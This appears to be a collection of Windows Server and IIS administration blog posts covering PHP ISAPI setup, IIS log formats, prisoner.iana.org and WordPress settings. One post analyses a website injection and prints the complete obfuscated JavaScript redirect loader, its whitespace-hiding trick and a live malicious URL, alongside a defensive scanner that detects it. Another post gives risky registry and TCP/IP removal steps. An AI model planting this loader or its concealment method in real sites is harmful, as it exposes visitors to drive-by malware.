POP3 Protocol Missing in Windows 2008 / IIS7

Where’s POP3?

A few people have asked where to find the POP3 service in Windows 2008 for a simple mail server. The answer: nowhere.

While SMTP is alive and well in the Features section of the Windows 2008 Server Manager, POP3 has been removed from Windows 2008 altogether.

POP3 has been deprecated and will no longer be supplied as part of the Windows OS. Although POP3 was introduced with Windows Server 2003, Microsoft removed it after including it in just one generation of the OS. Organizations that use the protocol will need an alternative such as Microsoft Exchange Server or Small Business Server (SBS).

POP3 isn’t a very “good” method of retrieving mail, and I know very few organizations that still use it. IMAP and Exchange connectors are far more feature-rich and useful, especially in today’s multiple-device world. I do run a POP3 mail server for World’s Cutest Animals because it is quick, uses minimal resources and is perfect for a mail server with only a few mailboxes.

Before we all scream foul and ask Microsoft to add POP3 back into Windows 2008 SPx, I suggest you check out Hannes Preishuber’s POP3 connector for Windows 2008 x86 and x64.

http://weblogs.asp.net/hpreishuber/archive/2008/04/30/visendo-smtp-pop3-extender-for-windows-2008-server.aspx

How to install PHP ISAPI on Windows 2008 IIS7 x64

With the release of Windows Server 2008 and IIS 7, Microsoft has included PHP5 FastCGI support. ISAPI is still faster in my opinion and, if used correctly, very stable. The PHP ISAPI DLL is 32-bit, so it will not load in a native x64 worker process. There are several ports of PHP to x64, but all have proved to be unstable. Below I outline the steps to install 32-bit PHP on Windows 2008 x64 and keep it stable.

  1. Install the PHP4 or PHP5 package (32-bit) in C:\PHP or wherever you like. Only use the Windows installer from php.net if you do not need any extensions. I would recommend downloading the PHP zip package. 
  2. Open the Internet Information Services (IIS) Manager. 
  3. Double-click “Handler Mappings” from the main IIS screen.
  4. Click on “Add Script Map.”
  5. Set up the handler mapping for c:\PHP\php5isapi.dll with extension *.php and check to allow the ISAPI extension and execution of scripts.
  6. Double-click “ISAPI & CGI Restrictions” on the main IIS screen. Right-click on PHP and select “Edit Feature Settings” and check “Allow unspecified ISAPI modules.” (The tighter option is to add C:\PHP\php5isapi.dll as a single allowed entry and leave unspecified modules blocked, so that no other ISAPI DLL dropped on the server can load.)
  7. Right-click on the Default Application Pool (or the one you want to use if more than one) and select “Advanced Settings.”
  8. Change “Enable 32-bit Applications” to True and click OK. This runs the App Pool in 32-bit mode, so if you have other modules that must run in 64-bit mode, it is best to split the website across two App Pools: one 32-bit and one 64-bit.
  9. Restart the server.

Javascript Spyware Redirect for IIS 6 (malware)

Below is the JavaScript code of an “injection” that inserts itself into the index file of a website. It is designed to go undetected by redirecting only seldom and at random. It is placed at the bottom of the source code, after a significant gap of whitespace following the end of the regular source (115 lines in all cases). In most of the cases I have come across, it redirects to a “spyware” or “virus” site. It also goes undetected by antivirus programs (Trend Micro, Panda, Avast). It works with Mozilla (2.0.0.11) and IE7 (I haven’t tested it in others). I’ll look into it further once I decode the script itself.

One of the sites it redirects to is: http://e.pepato.org/e/adsr.php?t=0 

It infects each individual .php file and does not re-infect after the initial infection. I have created new sites and cleaned infected .php files, and it has disappeared completely. It injects this code into .php (and .html) files about 115 lines below the last line. It ONLY infects index.php/html files in the root directory of the website; if you name your file index2.php, it will not be infected. The “modified date” time stamps DO change with the infection: there was a spread of one minute across hundreds of .php files. If you need a quick way to search all index.php/html files on a server, download Notepad++ and use the “search in directory” feature for certain strings of text. Alternatively, once you find the time stamp of infection, search for files modified at that time.

  1. var mf=” shapgvba ejtf(c){ine ro,con=\”HcvfNU)z\\\”n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&amp;IiOA|d@s=y7C:.XMq!xtSj;k{3u\”,olq=\”\”,i,nnu,l=\”\”,n;sbe(ro=0;ro&lt;c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu&gt;-1){ n=((nnu+1)%81-1);vs(n&lt;=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}”,rmhc=“”;for(gvg=0;gvg&lt;mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd&gt;64 &amp;&amp; fbd&lt;78)||(fbd&gt;96 &amp;&amp; fbd&lt;110)) fbd=fbd+13;else if((fbd&gt;77 &amp;&amp; fbd&lt;91)||(fbd&gt;109 &amp;&amp; fbd&lt;123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km=“&lt;A~Msi$U7#]FT#FGla&amp;#B#A~Msi$a&gt;U!c~T\”G]$K;Ms$G’Ua&lt;SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&amp;A?az!c~T\”G]$KMG=GMMGMza\\a&gt;&lt;<a>\\/SeRJ:1&gt;aUmxU&lt;/A~Msi$&gt;U</a>”; rwgs(km);

It looks like a newer variant; I’ve heard reports of similar activity as far back as mid-January.
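A scanner for the indicators in this post, added here as an example and not code from the original post. It assumes the markers described above: the appended loader unscrambles itself with shift-by-13 arithmetic feeding String.fromCharCode and eval(), sits after a long run of blank lines in index.php/index.html, and infected files share one modification minute; the 50-blank-line threshold and the sample files are constructed assumptions.

```python
"""Scan a web root for the injected redirect loader described in this post.
Added example, not the post's own code; samples below are constructed."""
import os
import sys
import re

MIN_BLANK_GAP = 50                    # assumption: post saw ~115 blank lines; 50 is a lower bar
SHIFT13 = re.compile(r"[+-]\s*13\b")  # the +13/-13 arithmetic of the ROT13 decode loop

# Constructed samples; the "loader" is an inert stand-in that only carries the tokens.
SAMPLE_CLEAN = "<html>\n<body>\n<p>Hello</p>\n</body>\n</html>\n"
LOADER_STANDIN = ("<script>/* constructed stand-in */var s='',c=0;c=c+13;"
                  "s+=String.fromCharCode(c);eval(s);</script>")
SAMPLE_INFECTED = SAMPLE_CLEAN + "\n" * 115 + LOADER_STANDIN + "\n"

def analyse(text):
    """Indicator hits for one file's contents (see the post's observations)."""
    # Self-decoding loop: shift-by-13 arithmetic feeding String.fromCharCode and eval().
    decode_loop = ("String.fromCharCode" in text and "eval(" in text
                   and SHIFT13.search(text) is not None)
    # A <script> that only appears after an unusually long run of blank lines.
    parts = text.rsplit("\n" * MIN_BLANK_GAP, 1)
    tail_script = len(parts) == 2 and "<script" in parts[1]
    return {"decode_loop": decode_loop, "tail_script": tail_script,
            "suspicious": decode_loop or tail_script}

def cluster_by_minute(entries):
    """Group (path, mtime) pairs by modification minute; the post saw hundreds of files in one minute."""
    buckets = {}
    for path, mtime in entries:
        buckets.setdefault(int(mtime // 60), []).append(path)
    return buckets

def scan(root, names=("index.php", "index.html", "index.htm")):
    """Walk root (all subdirectories too) and return (path, mtime) of each index file that trips an indicator."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower() in names:
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if analyse(fh.read())["suspicious"]:
                        hits.append((path, os.path.getmtime(path)))
    return hits

if __name__ == "__main__":
    hits = scan(sys.argv[1] if len(sys.argv) > 1 else ".")
    for minute, paths in cluster_by_minute(hits).items():
        print(f"{len(paths)} suspicious index file(s) modified in minute {minute}: {paths}")
```

Run it against a copy of the web root; a bucket holding many index files is the one-minute burst the post describes, and the flagged files are the ones to restore from a clean backup.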

Windows TCP/IP Service Worm and Uninstalling TCP/IP on a Domain Controller

As most of you know, Windows is a hotbed of viruses (not virii), worms, and malware. I’ve had the pleasure of finding a new worm that attacks the TCP/IP service: tcpsrv.exe in the C:\Windows\System32\ folder. This file is needed for Active Directory and the Workstation Driver (i.e. Client for Microsoft Networks). With this file removed, you cannot remote into your server or run Active Directory, and therefore not Exchange Server either. You can, however, serve web pages just fine with IIS.

I have three antivirus “managers” on my internal and external network: Panda Enterprise, Trend Micro ServerProtect and Avast Antivirus for Server 2003. My favorite is Avast because it is easy to use and “cheap.” The TCP/IP worm was not detected by Panda or Trend Micro. Avast only knew it was malicious and recommended quarantining or deleting it on restart. If you delete or even quarantine it, your server will no doubt be crippled: you will not be able to log into it through RDP (Remote Desktop).

When you try to log in through RDP (Remote Desktop), you type your username and password and an error pops up: “Cannot log on. The Workstation driver is not installed.” “Workstation Driver” is the common name for Client for Microsoft Networks, found in your network adapter properties. So how do you fix your server if you cannot log into it? It takes some telnet and some creative FTP in the Windows directory, which I will explain in a different post. For now, you’ll need physical access to your server, or someone with physical access who can follow instructions.

You can log in to your server at the console without a problem, because only the RDP login uses the TCP/IP Service, unlike the regular workstation login. Because the TCP/IP service is missing or corrupted, the following services (all found in services.msc from the Run command) will not work:

  1. Workstation (or Client for Microsoft Networks)
  2. Server
  3. TCP/IP Service
  4. RPC Locator
  5. Netlogon

The RPC Locator and Net Logon services depend on the Workstation service. All of these services should be set to Startup Type: Automatic and should be started on any machine. The Server service is what controls the domain controller, or lets your computer know WHAT it is. If you try to access Active Directory, you get an error saying “the domain could not be found” or “the computer is not part of a domain.” This is important for Active Directory and Exchange Server. Server requires the TCP/IP service to run. Steps:

1. Locate a fresh copy of tcpsrv.exe in a backup or in the i386 folder of the install disc. For Windows 2003 SP2 the latest revision is 2006. Put it into the System32 directory and manually restart all the above services. If this works, fantastic: it was an easily contained worm. If not, read on.

2. If the above did not work you’ll need to go into the network adapter properties and delete “Client for Microsoft Networks.” You will need to restart after you have done this. Once restarted, re-install Client for Microsoft Networks. You will need your Windows 2003 CD. Restart again.

3. Verify that the startup type for the RPC Locator service is set to Automatic and start the service. Do the same for the Net Logon service but do not start it yet. Start Registry Editor (Regedt32.exe) and then click the DependOnService value under the following registry key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Netlogon

4. On the Edit menu, click Multi String, type LanmanServer on a line by itself, and then click OK. In the Services tool, start the Netlogon service. If you cannot start it, continue with the steps below. If it does start, then start the Server service and verify Active Directory Users and Computers opens and you can see the available users/computers.

5. If the above still didn’t work, you may also have a corrupt TCP/IP stack and corrupt Winsock2. You’ll need to restart your computer in “Directory Services Restore Mode” by pressing F8 after the BIOS information has displayed. Once you have logged in, open Regedt32.exe and find and delete the following registry keys:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2

6. Locate the Nettcpip.inf file in your Windows\inf directory and open it in Notepad. Find [MS_TCPIP.PrimaryInstall] and edit Characteristics = 0xa0 to 0x80.

7. Go into the properties of your network adapter and click “Install,” select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK. 

8. This allows you to remove the TCP/IP service from a domain controller (which was not possible before). Now, in the properties box of the network adapter, select “Internet Protocol (TCP/IP)” and click Uninstall. Once it has uninstalled, restart the computer in Directory Services Restore Mode again. Reinstall Internet Protocol (TCP/IP) by going into the properties of your network adapter and clicking “Install,” then select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK.

9. Restart your computer in normal mode. All services should have started. If not, verify the above services are set to automatic and try to start them manually.

What is prisoner.iana.org?

On some of the servers I maintain, prisoner.iana.org shows up as a DNS entry in the system logs. Because of the name, it “looks” suspicious. It is nothing to worry about: there are no hackers, and nothing is wrong with your system.

IANA was the name of the organization that was responsible for handing out IP address blocks back in the day.

There was a need for a placeholder zone for the three blocks of non-routable addresses, so IANA set up three DNS servers: blackhole-1.iana.org, blackhole-2.iana.org and prisoner.iana.org.

If a system with an address in the 192.168.XXX.XXX range tries to register its PTR record without a local DNS server, it will try to register with prisoner.iana.org. Obviously prisoner.iana.org will reject the request, hence the many instances of this address in the DNS logs / Event Viewer. If the noise bothers you, host the reverse (in-addr.arpa) zone for your private ranges on your own DNS server so that the registrations never leave your network.

Microsoft Windows Server 2003 IIS Log File Format Comparison

Below are the log file formats supported in IIS 6. It is important to choose the right one for your server so that you can make use of the data it collects. I personally use W3C Extended because it provides the most information. The downside is that it produces more disk activity, however if you have a fast file system you may not notice a performance hit. I also like the ODBC logging because I can create a web-based front-end to display and manipulate the data/statistics. I’ve outlined the major components of each log format and the information it collects.

Microsoft IIS Log File Format

-Fixed ASCII text-based format.
-Cannot be customized.
-Records: client IP, username, date, time, service, server name, server IP, time taken, client bytes sent, server bytes sent, service status code, Windows status code, request type, target of operation and script parameters.

NCSA Common Log File Format

-Fixed ASCII text-based format.
-Cannot be customized.
-Records: remote host address, remote log name (blank), username, date, time, GMT offset, request and protocol versions, service status code and bytes sent.

W3C Extended Log File Format

-ASCII text-based format.
-Customizable.
-Records: Date, Time, Client IP Address, User Name, Service Name and Instance Number, Server Name, Server IP Address, Server Port, Method, URI Stem, URI Query, HTTP Status, Win32 Status, Bytes Sent, Bytes Received, Time Taken, Protocol Version, Host, User Agent, Cookie, Referrer and Protocol Substatus.

ODBC Logging Format

-Records to any ODBC-compliant database (SQL Server, Oracle, Access).
-Records: Client Host, User Name, Log Time, Service, Machine, Server IP, Processing Time, Bytes Received, Bytes Sent, Service Status, Win32 Status, Operation, Target, Parameters.
-In order to use this method of logging, the administrator needs to configure a database table with the appropriate fields and then configure a logon/password for use with the ODBC connector. Storing a database logon for IIS to use is viewed as a security risk. Do not use the SQL Server username “SA” for logging (even more of a security risk); use a dedicated account that can only insert into the log table. This method of logging can also slow down the server because the Http.sys cache is disabled.
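As an added example (not the post’s own code), a parser for the W3C Extended format described above that honours the #Fields directive and the “-” (empty) and “+” (space) conventions, followed by a per-client error count of the kind used to spot a scanner or a failing page; the sample log is constructed.

```python
"""Parse IIS 6 W3C Extended logs and count error responses per client.
Added example, not the post's own code; the log below is constructed."""
from collections import Counter

# Constructed sample: IIS writes '-' for an empty field and '+' for spaces inside
# header fields such as cs(User-Agent); the field list comes from the #Fields line.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2008-05-01 00:00:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2008-05-01 00:00:12 10.0.0.5 GET /index.php - 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
2008-05-01 00:00:13 10.0.0.5 GET /index.php id=1 80 - 192.0.2.10 Mozilla/4.0+(compatible;+MSIE+7.0) 200 0 0
2008-05-01 00:00:14 10.0.0.5 GET /admin/ - 80 - 198.51.100.7 curl/7.18.0 404 0 2
2008-05-01 00:00:15 10.0.0.5 POST /wp-login.php - 80 - 198.51.100.7 curl/7.18.0 500 0 0
"""

def parse_w3c(text):
    """Yield one dict per request line, keyed by the most recent #Fields
    directive (IIS writes a new one whenever the selected fields change)."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue                      # other directives carry no request data
        if fields is None:
            raise ValueError("request line before any #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):
            raise ValueError(f"expected {len(fields)} fields, got {len(values)}: {line}")
        rec = {}
        for name, value in zip(fields, values):
            # '-' means empty; '+' stands for a space only inside cs(...) header fields
            rec[name] = None if value == "-" else (
                value.replace("+", " ") if name.startswith("cs(") else value)
        yield rec

def error_clients(records, threshold=400):
    """Count responses with sc-status >= threshold per client IP (c-ip): a
    quick way to spot a scanner or a failing page from the log alone."""
    counts = Counter()
    for rec in records:
        if int(rec.get("sc-status") or 0) >= threshold:
            counts[rec["c-ip"]] += 1
    return dict(counts)
```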

Performance Tips: Disable Logging on Windows Server / IIS

Do you have IIS logging enabled? Do you ever use it? If you don’t use it, consider turning it off. By looking at the log files, you can see that an awful lot of text is recorded for every visitor. Items such as bytes sent, referrers, and domain/host info slow down the server considerably, and reverse DNS requests when logging host info for a visitor will really slow the server. For small sites hosted on powerful servers, performance may not be an issue. If you have a site with many visitors and/or databases (forums), logging can cause significant hard disk activity and paging. Bear in mind that the logs are also your only record of who requested what if you ever need to investigate a compromise, so consider dropping the expensive fields (host-name lookups, referrer, cookie) before disabling logging outright.

To disable logging, go into the IIS Manager -> Right-click on Websites and select Properties-> Uncheck “Enable Logging”

You can do the same for FTP sites. To disable logging for a specific site only, right-click on the site name and disable logging there.

WordPress & PHP on Windows Server IIS 6

This is a quick tip for those who are having trouble installing or using WordPress on Windows Server with PHP.

Make sure in the PHP.ini file that the following is set:

; Magic quotes for runtime-generated data, e.g. data from SQL, from exec(), etc.
magic_quotes_runtime = Off

If this is On, WordPress will not allow you to log in. It will spit out the following error:

“You do not have sufficient permissions to access this page.”

You CAN have magic_quotes (magic_quotes_gpc) On, though, which is a different setting. The setting above applies to data being pulled from a MySQL database, for example.

Also make sure the following is set:

; cgi.fix_pathinfo provides *real* PATH_INFO/PATH_TRANSLATED support for CGI.  PHP's
; previous behaviour was to set PATH_TRANSLATED to SCRIPT_FILENAME, and to not grok
; what PATH_INFO is.  For more information on PATH_INFO, see the cgi specs.  Setting
; this to 1 will cause PHP CGI to fix its paths to conform to the spec.  A setting
; of zero causes PHP to behave as before.  Default is zero.  You should fix your scripts
; to use SCRIPT_FILENAME rather than PATH_TRANSLATED.
cgi.fix_pathinfo=1